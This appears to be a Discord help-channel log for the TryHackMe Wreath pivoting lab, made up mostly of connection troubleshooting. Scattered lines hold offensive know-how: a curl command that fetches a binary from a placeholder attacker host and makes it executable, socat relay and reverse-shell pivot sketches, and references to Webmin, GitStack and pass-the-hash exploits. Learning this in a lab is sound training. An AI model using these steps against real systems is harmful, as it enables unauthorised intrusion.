#wreath-network
What's your subnet?
- It's okay was just a slow reboot. I'm struggling with one of the tasks and wanted to rule out the fact it'd been online for 12 hours.
I've been raging for ages on Task 29 and now I realise the -S in the php server is actually case sensitive haha
Hello, I have a small problem to access the windows machine from a compromised server, in my terminal I am told that I am connected to the server but when I type the ip 10.200.81.150 in browser I can not access it
.150 is the Git Server. Which task are you on?
I am on task 28
Task 28 is Empire hop server?
yes
So you've already been connected to .150 with whatever tunnel in the previous sections?
yes, it worked yesterday but now it doesn't
You'll need to re-add ports to the firewall exceptions.
I used sshuttle so sshuttle to webserver (.200) then can view the git server in a browser (.150)
I also use sshuttle, but can I send you a screenshot in PM? I don't have the permission here.
!docs verify
You can post screenshots once you verify.
okay thanks I'll do that and send you
Just post in here no need to DM.
IP addresses have 4 octets.
It's like me and my case sensitive PHP server flag yesterday. It's always the simple things.
I did not see, 10.200.81.0/24
it works now
yes it's true, I made an error of inattention
And also I had a last problem it was when I wanted to create a http_top listener it put me an error
im starting wreath now... god rest my soul
After starting the web server with 'sudo python3 -m http.server 80' in task 17, how can you see that it is running as the video says at 1:41?
Will look like this.
That's how it appears to me, but if you see the support video, the person can execute commands or has a root user that I don't understand how to access him after he says 'let's go to our python server' in the minute I mentioned before. the part that shows me, being there, I can't continue with the task.
or tell me please from where do I run this 'curl ATTACKING_IP/nmap-USERNAME -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME'?
Well, break it apart and think about it.
What are those commands doing?
Hey Muiri, I completed this room at the weekend, it was great. Really informative and well put together. Thanks for your work.
Gave +1 Rep to @merry robin
Glad you enjoyed it
Really nice to learn about pivoting through networks like that.
50% done with wreath. man my mind is blown
It was the first THM room where I realised I needed to be more organised haha. At one point I had my terminal split into many different windows, sshuttle here, chisel there, ssh in another, curl requests in another etc haha.
Should have seen my Tmux panels during testing 
am I terrible for quite enjoying qterminal and not having learned tmux yet
I think I've gotten used to the Ctrl E/D/R shortcuts and now tmux hurts my brain.
i just use the normal kali terminal. i have sshuttle and chisel next to each other, then the py servers i ran, then id run shells/winrm/ssh next to it
@merry robin thank you for the great teaching points omfg
Gave +1 Rep to @merry robin
Hello everyone, I feel like the web server is struggling atm, is everything ok ? (EU-West)
Wreath doesn't have regions
There's several instances
Please state which instance you need resetting
Could you be a bit clearer? Cause I don't see a region associated with networks, like EU
The third octet of your addresses is the instance
There are no regions
Its 57 if I remember it correctly
You can vote to reset every hour so I recommend doing that anyway
Great! Will do that, thanks for that :)
Hi, I am at task 18 git server pivoting. I used sshuttle to take access when I got connected its saying
"Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache."
and i can't open 10.200.57.150 on web browser can anyone help ?
Screenshot @mellow kernel
well i resolve that DNS error
I'm going back over it today to do an official pen test write-up for my own XP. So I could probably see what I did because I think I had that issue as well
but how do i access .150 webpage
Add it to your hosts.
Whenever you did the in-map scan it should have said cannot reject you something. something
Redirect
Add that name as well as the IP address to your host file
Nmap,**
no nothing like that happen when i did nmap
You will soon realize that most of everything behind a public facing IP address that they give you you will have to add to hosts
It didn't say anything under port 80?
it just gave me live hosts and ip i should do it again
It should have said something like cannot contact Port 80 or something and it redirected from something.thm
I'm not at my computer so I cannot pull up my host file but I can give you the address and such whenever I get back to it
Try and add the dot 150 address hosts
i did nmap again this is what it returns
Nmap scan report for ip-10-200-57-150.eu-west-1.compute.internal (10.200.57.150)
Host is up (0.00070s latency).
show your shuttle command
sshuttle -r root@10.200.57.200 --ssh-cmd "ssh -i id_rsa" 10.200.57.0/24 -x 10.200.57.200
c : Connected to server.
i tried curl 10.200.57.150 through ssh and the whole terminal got stuck
cant ctrl + c either had to close it
So here's the thing. Everything is correct and if it says connected to server you are fine. If it doesn't go down or kick out any errors you are
Connected
Connected to dot 150, it took me about 4 to 5 minutes for the page to load
Is this the part where you foxy proxy too
if i ping to .150 i should get a reply ?
how do I confirm i am connected any command ?
If you're connected to a shuttle you should be able to ping.150. the problem is it's an internal Network so if you're outside of the internal connection you won't be able to ping anything
Screenshot with s shuttle says for me whenever you connect
right now i am connected
with sshuttle
wait i just got an error from sshuttle
client_loop: send disconnect: Broken pipe
c : fatal: ssh connection to server (pid 5531) exited with returncode 255
Okay there's an error for the broken pipe in the wreath section I think
how do i fix this ?
i am already using -x and excluding .200
can someone help still stuck at task 18
Hello, I have problems connecting to the wreath-network, I run the openvpn file and in the access section it appears disconnected, what can I do in this case?
Ignore the access page
could you help me with task 18, I have tried everything now its not working for me
No, I cannot.
could you reset wreath ?
No, I cannot.
Mods are not site staff.
Mods are not support staff.
There are many many instances of wreath. If you'd like help resetting your instance, please specify what instance which is the third octet of machine IPs.
.57
You can add an additional vote to reset every hour, so you're able to reset the network yourself over time.
Do you mean that it is not necessary to show the Internal Virtual IP Address and the Connected well configured for it to work and that way I will have a connection with the wreath machine?
I mean explicitly what I said, ignore the access page.
It is unreliable, and hence a terrible indicator of connection status
I understand, but the truth is that I ping the machine and I don't have a connection... so I can't perform the tasks of the wreath
Ok, and that is indeed an issue.
But that issue is unrelated to the access page, and does not indicate that you should trust the access page.
any advice?
should I download a new configuration file?
Hello, I am struggling to understand the chosen order in the socat command I highlighted in my screenshot.
I understand that the first address is the source, and second one the destination. So if we want to get access to the webserver on .10:80 on our .2:8001, why do we have to put the .2:8001 first instead of putting .10:80 ? Hope this was clear enough
Because to me the stream goes as this : Target Webserver (source) --> compromised machine --> local attack machine (dest)
where am I wrong here ?
To add to my confusion, the following command socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & is forwarding everything reaching port 8001 to port 8000, which makes sense to me (source, destination)
hello, in task 18, what is the id_rsa that should be used to be able to execute sshuttle?
The same one you use to log in
The ssh part of sshuttle is ssh
It's not a source and destination -- socat creates bidirectional tunnels between two points.
What goes into port 8000 locally will come out of port 8001, and vice versa.
The remote socat command (I.e. the one on the jumpbox) connects 172.16.0.10:80 to your local port 8001
I.e. what goes into port 8000 on your box will come out of port 8001 and get forwarded to 172.16.0.10:80
Then the response from 172.16.0.10:80 goes straight back through the tunnel.
.10:80 -> .2:8001 -> .2:8000
Ooh I see ! I saw something false somewhere else then, thanks a lot for your time
This clears up a lot of (useless) confusion
Np :)
Sorry but I don't understand you, can you explain to me in an illustrative way which id_rsa I should use please?
Which? There's only one
I see you don't understand me.
What private key should I use in task 18?
I don't know how else to ask you...
There will only be one.
haha, leave it like that, thanks, I'll ask the others to see if they give me an answer
Gave +1 Rep to @strange bison
Does anyone know what is the content of the private key used in task 18?
Is there an issue with ssh on octet .101 on the .200 box?
I was connected yesterday just fine, but now I can't ssh or use sshuttle on the initial webserver - just get a 'connection closed' error.
I've confirmed I can ping the machine and ||use the webmin exploit to access the shell through there. ||
||I've also confirmed that ssh is open on the machine and the id_rsa file I have matches the one on the box itself.||
I should also clarify that I have reset the network since this issue and it still happens
are you using the -X flag
No, because I'm not getting either the c: connected message or the broken pipe one. There's just no response. When I was connected previously, I did not need to use the - x flag.
Completing wreath really unlocked a new skillset for me. Thanks THM
what do you recommend guys? can i still do this on attackbox or my own vm kali?
"Official" answer would be to use the attackbox, and most of it will work in the AttackBox.
Practically speaking, you'll find it easier to use your own box for a plethora of reasons.
Thanks
I sshed into 10.200.87.200 and i tried to curl http://10.200.87.150 but it gets stuck, i dont get a response back of any kind. i tried nmap -p80 10.200.87.150 from 10.200.87.200 and i get 80 as filtered
i tried reseting the box
my vm is connected to the network but there is no ping
or nmap scan there is no result
any reasons as to why?
same here
i recently reset the machine because of this
no still it didnt resolve the issue
still not?
no can you ping it ?
10.200.87.200 works fine for me, the rest two dont work
lets see
when is the latest i can get back after all the reset to do the room again?
after how long time?
single user can reset once per hour
Which network?
Normal VPN pack or the Wreath VPN pack?
wreath
No idea then I'm afraid. I can't debug the network status
ok
i could nmap it but could not get the webpage to open even when i add the ip address to etc/hosts
still its been 24hr and 2 resets can you please notify any of the thm staff ?
I was able to login with || evil-winrm as Admin (Pass The Hash)|| yesterday
And now it just refuses to connect
NVM forgot to ||use sshuttle|| :p
Hi there I try to use chisel with proxy. When I use chisel server on my kalibox it works, but when I try to use chisel client on my kalibox it does not work. Then comes a connection error, does it have something to do with the firewall? Should I try to change the firewall settings? Many thanks in advance! Here is a screenshot...
Use a colon to separate the IP and port. Right now, in your client, you're using 10.200.57.200.8080. it should be 10.200.57.200:8080
Thank you! But even with the change . -> : the error is the same. Any ideas?
Gave +1 Rep to @fervent summit
Hi, the host seems down, can someone please vote for restarting the network?
Having some issues downloading the Webiste.git directory through evil-winrm.
It says completed almost immediately yet nothing is downloaded
Has anyone tried VPN tunnels over ssh with adding interfaces to not have to rely on socks proxies over proxychains?
It will work, yes.
That was something I chose not to add into the network, but was intending to put into a follow-up box a while back. It has been tested in the Wreath network though.
That said, you will need socks proxies anyway -- all SSH Tunneling would do is get you through the first box, which you can use sshuttle for anyway. Still need proxying for the Windows sections
Shuttle is good until you have to scan anything. Not sure other people have this issue but when I use nmap over sshuttle it just says all ports are open even the closed ones.
Tried to do VPN over ssh without sshuttle by adding the interfaces and setting up Nat. But it doesn't route properly. The route you would put for 10.200.X.0/24 is already cleaned by the ovpn connection.
Trying to just state a single route with 10.200.X.150/32 doesn't break the route but nmap doesn't seem to see the first windows machine through the ssh vpn tunnel. Even if you try to specify interface with -e tun1
hi
im doing wreath room
but the exploit isn't working
task 6
this is the error am geting
[-] Failed to connect to https://10.200.105.200:10000/
@merry robin
Will try sshuttle with nmap -sT TCP scan.
I'm having trouble building the bash script to check on ports are active and allowing ICMP... do you have a recommended resource to get better at this? what was your approach?
I know the basics of what is going on here but I might be missing a piece or two
do you want to add command line options to your bash script so you can specify options/flags like you can do with nmap
@nocturne zodiac using -sT didn't work over sshuttle
shuttle says closed ports are open
yes, this is related to the last question of Task 9
+rep @lilac ibex
Gave +1 Rep to @lilac ibex
+rep @nocturne zodiac
Gave +1 Rep to @nocturne zodiac
All good. Was worth a try though
I have a few questions about Task 13 Pivoting Socat
I was able to get through the point where I retrieve the executable from the attackbox but can't get the full reverse shell relay going
tried getting a portable nc from github but now failing to compile it locally before shipping it to the vulnerable server
I think that is the only missing piece in both the paths to 'reverse shell relay'. How do I tackle this on this lab?
@raven whale I did this with a mix of sshuttle, chisel, and metasploit.
Can try again later with socat if you still need help when I'm free.
Sounds good @lilac ibex. Thanks!
Gave +1 Rep to @lilac ibex
@raven whale socat on first pivot to get revshell from second machine right?
correct... I'll see if I can get back to it today. I'll let you know what I find out @lilac ibex
well... I can't reach the prod server... just put in a request for reset and we need 3 more for it to take effect
@raven whale got it with redirection as shown in socat section but not sure how to do it with full socks proxy over socat. However make anything like a firewall isn't getting in the way ;'..;'
Going back to 'what the shell?' to review proper implementation of different types of shells
@lilac ibex ^
@raven whale powershell reverse shell through socat relay
<lhost-attacker> <pivot-socat-relay-no-socks-proxy> <internal-machine1>
<listener> <----[revshell]----- <relay-pivot> <---[revshell-ps1]--- <internal-machine-one>
haven't tried chaining together for dual pivoting though
would assume you would do the same thing 2x for every other pivot or through another pivot technique
Reverse shell with socat. Did bind shell when playing around with metasploit.
I'll give those approaches a try later today. Thanks @lilac ibex!
Gave +1 Rep to @lilac ibex
I may have broken the wreath network (prod-serv) during an alternative pivot attempt a few seconds ago - sorry
Hello am I on Task 20 and I added the info to etc/hosts but I cant get access to it:
So is my etc/hosts:
Learning
10.200.101.200 thomaswreath.thm
10.200.101.150 gitserver.thm
i can access using the ip 10.200.101.150
reset network?
I just completed the room, it was running fine
Its a long room but its fun 🤣
yes hahah, I learned a lot from it
I don't quite understand what they mean when they say "transfer the private key to the box". To make sure. Do I have to take the "id_rsa" key that I generated with ssh-keygen, and put that into the .ssh directory of root on the network?
Just to make sure as I don't want to break the box
How about putting it somewhere where it won't overwrite the existing key
Like, /tmp, for example
Mhm
Wow. It takes so much brain power to actually understand SSH tunneling and port forwarding
Heh, that's just port forwarding and proxying too. Be glad I didn't include the instructions for true SSH tunneling
Was considering building out a sequel for those, but time and motivation 🤷
What would you say is the hardest topic in penetration testing. Forget about "depends from person to person". What is the hardest topic for you in Cyber Security? Is port forwarding and ssh tunneling one of them haha?
I really dislike Reverse engineering, as I find it hard. Cryptography is also hard 🤷 I think it'd be difficult to find a single hardest thing
"Penetration testing" is a topic in and of itself, usually covering one or more of infrastructure testing, cloud configuration tests, web application testing, code / software review, etc.
In terms of hacking generally though, I'm not a huge fan of binex (binary exploitation) at this point in time, personally. I intend to deal with that as soon as I've finished OSWE
Port forwarding and tunnelling are easy, they just need decent networking foundations. Once you understand how traffic flows around a network, forcing it to take another route is fairly straight forward.
Have you ever actually needed to pivot on a test though? Genuinely curious as I've not even seen anything other than large single domain env's with no need to pivot at all so far.
Eh, not really. Once you're in a domain it's almost certainly just gonna be straight-up lateral movement.
Honestly I use it more often to get into my work lab environment lmao
Normal people just run a VPN server to get into the env
Yeah, tbh, I usually am DA before I even get on a windows machine
all my jobs have been citrix
It's a useful skill to have though. Only time it's likely to be useful irl is if you've compromised a jumpbox though
Yeah, figured as much.
Heh, try working in a bank 
Hello,
at task 42. How did u manage to upload winpeas and which one did u guys upload?
Evening. I just have one question. In the second example it supplies 2 ip addresses, '172.16.0.x' and '172.16.0.5', but the command is as follows: 'sshuttle -r user@172.16.0.5 172.16.0.0/24'. Is the '172.16.0.0' a new ip address or does it refer to the .x address? And is the /24 a port? Thank you
no.... 172.16.0.0/24 is a way to mark a whole subnet
this image might help a bit
so subnetting is basically dividing a network into two or more networks?
yuups kinda
the #pre-security-legacy-path slightly goes over this if you have not done that yet
Those numbers are confusing ngl
Ive done that room
I just don't remember what exactly I've learned there
Thank you for dis
Gave +1 Rep to @split harbor
did you skip the essential note taking??
haha in the beginning yes. But I make sure to jot down everything :/
Time to go over that pathway again. 2 steps forward one back
nah 1 000 steps forward and 1 back to remake notes
Indeed
Best advice I can give you here is to go back and learn how things work before you start trying to attack them. I say that as the guy who built this thing, but I mean that just generally. Trying to build with no foundations will never end well. You won't understand what you're doing, which means you'll break stuff, which means you'll get fired, assuming you even manage to get a job in the industry without said foundational knowledge.
That's a general statement for the record, "you" applies to anyone in a similar position, rather than just yourself
There's nothing to be gained from leaping in two-feet first without understanding the underlying technologies, and no shame in taking the time to learn them properly before starting with the "cool" stuff. Perfect example is above: attempting to attack a pivoting network without understanding how networks work. In a lab environment you get confused and need help. IRL you break shit and cause big issues 🤷
network responding super slow
ye 10.200.101 seems to be down or not working properly - it was running extremely slow so I let it expire and upon restarting cant connect or see anything scanning after ~20 minutes
i try later 🤷
Im having trouble at task 20 where I actually have to run the python script to exploit the gitstack service. I'm getting an error
If someone could help me that would be really nice
do python3 -m pip install requests
No matter what command I use to install the requests I get this error. Is there a way to uninstall and reinstall them?
When trying to uninstall them it says this
ah maybe it is python2 and not python3
/usr/bin/python2: No module named pip
Why not check what's in the shebang?
because shadow has not started this network and therefore does not have the script
Ive added the /usr/bin/python there
wait
I guess i've got something working but not really
EDB number is there, so you could grab it
true
have you guys done this room?
I have.
You're trying to run it as a bash script here
Just... python3 43777.py
Ok, then use python2
And make sure you install the library for python2
This is why we use Kali, one of many reasons. It still ships the libraries and pip.
i cant progress because the network isnt working properly. reset it last night and worked fine for when I was using it but logging on again this morning i cant connect its unreachable
There is a Python 3 conversion of that script literally pinned in this channel
Thank you Muiri. I've not known that
Hi here, I'm trying to exploit the web server from task 6 and I'm using the exploit from MuirlandOracle github but I'm getting this error: Cannot import mappings from "collections". Any clues how to resolve this? thanks!
Screenshot? @azure current
I tried to enable but not getting it to turn on
I have trouble with task 34. I got chisel running and can connect to the page via proxychains. But wappalyzer gives me the wrong version number. XXX #.#.# instead of XXX #.#.##
I also tried whatweb through proxychains but this did not work. Is there a similar extension I can use?
Oh and even XXX --version on the git server gave me the same version number which wappalyzer provides...
Apologies, I was on the wrong machine
Hi, I'm trying to connect to Wreath network but I'm getting this:
$ ssh root@10.200.101.200 -i id_rsa
ssh: connect to host 10.200.101.200 port 22: No route to host
I'm using a personal kali linux machine with openvpn:
$ sudo openvpn xxxx-wreath.ovpn
[...]
2022-09-24 12:40:26 OPTIONS IMPORT: timers and/or timeouts modified
2022-09-24 12:40:26 OPTIONS IMPORT: --ifconfig/up options modified
2022-09-24 12:40:26 OPTIONS IMPORT: route options modified
2022-09-24 12:40:26 OPTIONS IMPORT: route-related options modified
2022-09-24 12:40:26 OPTIONS IMPORT: peer-id set
2022-09-24 12:40:26 OPTIONS IMPORT: adjusting link_mtu to 1624
2022-09-24 12:40:26 Using peer cipher 'AES-256-CBC'
2022-09-24 12:40:26 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-09-24 12:40:26 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-24 12:40:26 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-09-24 12:40:26 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-24 12:40:26 net_route_v4_best_gw query: dst 0.0.0.0
2022-09-24 12:40:26 net_route_v4_best_gw result: via 192.168.1.254 dev eth0
2022-09-24 12:40:26 ROUTE_GATEWAY 192.168.1.254/255.255.255.0 IFACE=eth0 HWADDR=00:e0:4c:82:01:5f
2022-09-24 12:40:26 TUN/TAP device tun0 opened
2022-09-24 12:40:26 net_iface_mtu_set: mtu 1500 for tun0
2022-09-24 12:40:26 net_iface_up: set tun0 up
2022-09-24 12:40:26 net_addr_v4_add: 10.50.102.160/24 dev tun0
2022-09-24 12:40:26 net_route_v4_add: 10.200.101.0/24 via 10.50.102.1 dev [NULL] table 0 metric 1000
2022-09-24 12:40:26 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-09-24 12:40:26 Initialization Sequence Completed
┌──(rodolphe㉿LAPTOP-KALI)-[~/…/Cyber/THM/Wreath/tmp]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
24: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_pie state UNKNOWN group default qlen 500
link/none
inet 10.50.102.160/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::8923:8577:542a:16f/64 scope link stable-privacy
valid_lft forever preferred_lft forever
I have the same issue :/
try to ping the ip
and then do simple port scan or nmap scan to check that ssh service is running on which port
Read the error message...
"No route to host". i.e. couldn't get into the network.
but he is connected to vpn
Whether that's local routing or a problem with the network instance I have no idea.
then local routing problem
Or a problem with the network instance.
More likely the latter to be quite honest.
Either way I do not have the power to debug it.
i would debug like i told
it may be possible that ssh service not available on that port
Then the error would be "connection refused"...
yep you are right
Muirland is the creator of Wreath.
I'd recommend his advice first and foremost.
Please make sure any troubleshooting advice you give is accurate, your advice here isn't overly applicable.
sry
Hello guys I'm trying to ssh as root on prod-serv but I'm getting this:
ssh -i id_rsa_webmin root@thomaswreath.thm
Load key "id_rsa_webmin": error in libcrypto
root@thomaswreath.thm: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
who mess up wreath network? 3/5 votes to restart the lab
I knocked it up to 4/5, just need 1 more
Please specify the instance when you're asking for resets. You can add a vote every hour too.
Hi ! I have "zsh: segmentation fault ssh -i rsa_id root@10.200.90.200" when trying to connect ssh so the pivoting with sshuttle cannot be done, anyone faced this issue ?
try changing shell to bash and running the same command there???
bruh now I have "root@10.200.90.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
" any tips or It is supposed to be like that ?
the command :
if anyone has infos pls ping me
literally stuck here for a day
After resetting the labs I still have this error any help @merry robin
This machine is unreachable
Nevermind I used chisel, ssh is broken
Not too sure what I am doing wrong here...can anyone take a look at my screenshot and throw some advice my way haha? thank you.
The id_rsa key that I am using is the same one that we are able to find in the roots .ssh. Is that the correct key to use for this?
....Anyone having this issue just add sudo. #K.I.S.S.
~~can someone vote to reset please 10.200.81.200 isn't responding ~~ tyty
Anyone else on 10.200.101.200....can we reset? Need 3. Thank you
so just do sudo ssh IP -i id_rsa?
will do and come back
prod-serv IIRC does not allow you to log in whatever you do, you need the password
Put sudo before the sshuttle
Also make sure you have the id_rsa perms set to 600
Evening. I'm having some trouble to start the php server on the port that my listener is on. I think im getting confused with some of the ports. Any help would be appreciated
You can't start it on the port you're already listening on, I suspect something has gone wrong here
Your c2 is listening for the connection
Assuming it's a reverse payload
yes the c2 listener is listening on port 45000
so I cant listen on port 45000 with the php server?
Because on dark secs video he has a listener on 17000 and then also starts the php server on 17000 so I'm not quite sure how he did that
Okay I got it to listen but now it's giving me this error: "[root@prod-serv hop-apollyon2]# [Fri Oct 7 19:04:01 2022] 10.200.85.150:50196 [404]: /news.php - No such file or directory"
anyone having problems with vpn file? cant download it
Please elaborate. What do you mean by can't?
Looks like a problem with your kali tbh. Download it on your host of it's a VM
Then copy it in
made it, thanks
Gave +1 Rep to @strange bison
getting problems with connection on vpn wreath
Please provide more information.
"Problems" doesn't tell us anything
well...access machines doesnt turn to wreath ip
Ok. That's not a problem.
should work anyway?
Why not try it?
im trying to nmap the two others machines and nothing happens
i made the first one yesterday... so anyway, everything apparently work fine?
ok. and what could be wrong with nmap on the other two machines?
Without knowing more about what you're doing, and then troubleshooting, I can't say.
task 17 git server enumeration, trying to nmap 100,150
You've just reposted the same thing again.
"Failed to execute command" looks like the problem there. Doesn't look like a network issue.
you told me "Without knowing more about what you're doing, and then troubleshooting, I can't say."
ok
Without knowing more. You posted the same thing again. That's not more.
will take a look on the nmap scan
dont know what more to say.. thats the problem then, nmap those ip
Probably been asked before, but how long does it normally take to spin up the network? Still no ping at 27mins here now
I just wrapped up wreath. Big thanks @merry robin for the amazing experience.
Gave +1 Rep to @merry robin
someone having issues when running empire? my machine is working very slow...
Hey guys for the wreath network -- just to clarify we have to laterally move from the first foothold to a different box (with windows & other) correct if im wrong
Spin it up real quick man
anyone up doing wreath rn ?
trying to ssh to web server , but keeps getting errored out
root@10.200.85.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)
to add: my ssh private key permissions are 600
Are you, uh, not following the tasks of the room?
Nope, im attempting to get the box before I redo it again and follow the room task
im already at the late stage
its kinda more of an educational thing for me as well
Hey man whats the error?
The problem is that these are shared labs, and you might do something that disrupts others' experiences
I also got the same issue..
Trying to ssh into the box with the private key produces that error
May I suggest following the instructions that explain the killchain of the network, rather than trying to wing it then asking for help? 
Those things are there for a reason.
That and, as James said, there are specific instructions about how to approach things in a way that does not mess up the lab for other people
In particular regarding changes to configs, updating firewall rules, naming conventions for uploading scripts / tools, etc
Case in point is above -- some moron has overwritten either the private key or the authorized_keys file on .85.200. That's one or more of:
- Stupidity
- Not reading the instructions
- Malice
Either way it now requires everyone else in that lab to disrupt their own experience and reset the boxes.
(Side note, if you're on 10.200.85.0/24 and that was you, please vote for a reset and follow the instructions for how not to fuck it up lmao)
*100.200.85.0/24
Ta James
No, I am on 10.200.90.0/24
Also, I did follow the instructions and it just gave me more confusion. I won't ask again thanks
What was confusing?
Its all good thank you ill find a way
Hello to all. I am working on Wreath after the stage of the operation of the Webserver, I noticed that its IP address is no longer reachable. I tried to restart the room, change the VPN file but when I try to ping it doesn't work. Can anyone help me please?
Jumped on today to try and pick up where I left off yesterday - the network is no longer responding to ping (gives error Destination Host Unreachable), can't ssh in (gives error "ssh: connect to host 10.200.85.200 port 22: No route to host"). I've voted for a reset but it's only at 3/5 so any help would be appreciated @merry robin cheers!
Nothing I can do I'm afraid
I've never had access to the network administration interface -- I just built the thing 🤷‍♂️
think you can add a vote every hour or so too
all good! thanks for the reply, I'll just vote for a reset again in an hour
Gave +1 Rep to @merry robin
@merry robin i am going to begin my journey in this path, im totally flabbergasted of content in this room. however compliments to you and wish me luck in this room
Gl
ok so im trying to nmap the webserver
and it is taking ages
like ages
cant even ping it might be the firewall tho
hello!
i am trying to use sshuttle for the first time and im getting this error but dont really know what does it mean or what am i doing wrong. can u guys please give me a hint?
Are you using WSL or similar?
yes, i am using wsl
It won't work then
noooooo
Make a VM, it's generally better. Snapshots are cool.
alright. thank you
Gave +1 Rep to @strange bison
Quite. Means you didn't compile it statically.
ah. yes. that explains everything:) thanks
Gave +1 Rep to @strange bison
hello again. i cannot access the network after it went to sleep because i forgot to extend time. yesterday same thing happened.
can you curl 10.10.10.10/whoami
if that gives you an ip you are connected
Not to the Wreath network you ain't 
10.10.10.10 is in the public subnet
sooo that is not a way to check if you are connected to wreath??? welp then that is a problem shadow dunno how to handle
The machine is not showing up while ping
Hi everyone, did you know why the machine about Wreath doesn't work? I checked my vpn and generated another one, nothing happened, how can I fix that? Thanks
Are you using the Wreath VPN or your normal VPN?
@waxen nebula Wreath vpn
And you've checked the status that it's connected? What response do you get? Have you tried connecting using the AttackBox instead?
status about vpn when i am connected with vpn wreath is access machine in red color, i'll try with AttackBox and i give answer asap when it's up
Destination Host Unreachable with AttackBox @waxen nebula
Have you completed the NMap room, suggested in Task 5? Have you tried different switches with nmap?
yes task 5 is completed with nmap i'm actually at 14 and have tried another switches with nmap but nothing
Can someone please explain to me why on earth metasploit portfwd is not working?
The first time it works just fine and then it just hangs when I make requests to my machine. curl also does not work, it seems to be loading infinitely. Was this made on purpose?
yes for me too
v
yay now suddenly it works
hi I'm in task 6. at first the id_rsa file was empty but now I'm getting the root@10.200.85.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). even after i got the rsa file. can someone help me figure this out or show me where to look for the answer please?
Unfortunately, the chances are that it's not your fault. These are shared networks, and many people are, frankly, either absolute assholes who like spoiling it for other people, or idiots who can't follow instructions and break it for everyone else by accident.
I added extra protections to that file, but it still gets broken fairly frequently and I don't have access to improve it anymore.
If the key is missing, go for a reset.
I found the new one next morning but it didn't work, it gives me a Permission denied (publickey,gssapi-keyex,gssapi-with-mic) error. I checked the config file on both the attack machine and the victim machine and they seemed fine. Idk if it's the new key that is the problem or I'm missing something, because idk how the key just appeared next morning.
Hey, i keep getting timeouts when i try to access the homepage via FF in "Webserver Enumeration". I changed the host-file and the dns works but i still get timeouts. Is this a known problem if the network is borked? Or is this more likely my machine? I can scan and ping the machine.
@marble flax
daw
So I downloaded the id_rsa to be able ssh back into the prod server... but when I attempt the ssh, sometimes it just stays with no output ever happening until I finally Cntl C it, and sometimes nothing happens for a few min then it tells me "connect to host 10.200.105.200 port 22: connection timed out" ... I can ping the server no issues, I even tried a plain "ssh root@10.200.105.200" to see if I get asked for a password but no I just get the exact same response - nothing happening or sometimes that timed out response.... When I add a -vv the final output before nothing else happening until I close it out reads - "debug1: expecting SSH2_MSG_KEX_ECDH_REPLY" - that's when trying to use rsa key, and when doing a -vv on trying to connect with password instead of the key, it gets stuck on "debug1: connecting to 10.200.105.200 port 22" before getting connection timed out ultimately ... Any suggestions?!? Thanks in advance
I think the keys are messed up because I have a problem with the private key on the other machine. And the public keys are changing every day, it's either someone messing with them or people can't find it and just generate their own.
Ehhhhhh okay that sheds some light on the issue, thanks
Hello guys
Can't download wreath network vpn config file.
It is only redirecting to a 404, any help?
hi i checked the ssh_config file on the server and i saw that the password authentication is commented out and i believe that is what is preventing me from sshing into the system. i can't change it and i don't want to break anything trying so if i can get some help with it that would be great. this is the error that I'm getting if it's relevant: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
That is correct -- it just means that you can only connect using a key, not with a password.
The error you're getting is usually when some idiot has overwritten the key on the box, or removed the protections on the authorized keys file to overwrite that
TL;DR: reset the network and try grabbing the key again
thank you
Can confirm . Was banging my head on this same issue for 2 hours. I'm also using WSL.
$ sshuttle -r root@10.200.84.200 10.200.84.150/8 --ssh-cmd "ssh -i id_rsa" -x 10.200.84.200
c : Connected to server.
Warning: ip6tables-legacy tables present, use ip6tables-legacy to see them
ip6tables v1.8.8 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT.......
I can't get my wreath network vpn to work, anyone else?
It just says network unreachable
should you be able to ping 10.200.xx.100 from 10.200.xx.150?
is the network working?
Yes
Hi, this is related to https://tryhackme.com/room/wreath : Web server exploitation section:-- while running script :- I am getting this error python3 CVE-2019-15107.py . Please help
Traceback (most recent call last):
File "/home/kali/tryhackme/AD/wreath/CVE-2019-15107/CVE-2019-15107.py", line 10, in <module>
from prompt_toolkit import prompt
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/__init__.py", line 16, in <module>
from .interface import CommandLineInterface
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/interface.py", line 19, in <module>
from .application import Application, AbortAction
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/application.py", line 8, in <module>
from .key_binding.bindings.basic import load_basic_bindings
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/key_binding/bindings/basic.py", line 9, in <module>
from prompt_toolkit.renderer import HeightIsUnknownError
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/renderer.py", line 11, in <module>
from prompt_toolkit.styles import Style
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/styles/__init__.py", line 8, in <module>
from .from_dict import *
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/styles/from_dict.py", line 9, in <module>
from collections import Mapping
ImportError: cannot import name 'Mapping' from 'collections' (/usr/lib/python3.10/collections/__init__.py)
I'm unable to download another Wreath VPN file as well
@surreal sail @ionic tide
Found the solution to the 404 error when generating a Wreath VPN, just leave the Wreath room.
To do this go to the and select the gear setting icon next to Help and press 'leave'. Then rejoin into the network and you should be able to generate a new Wreath VPN file
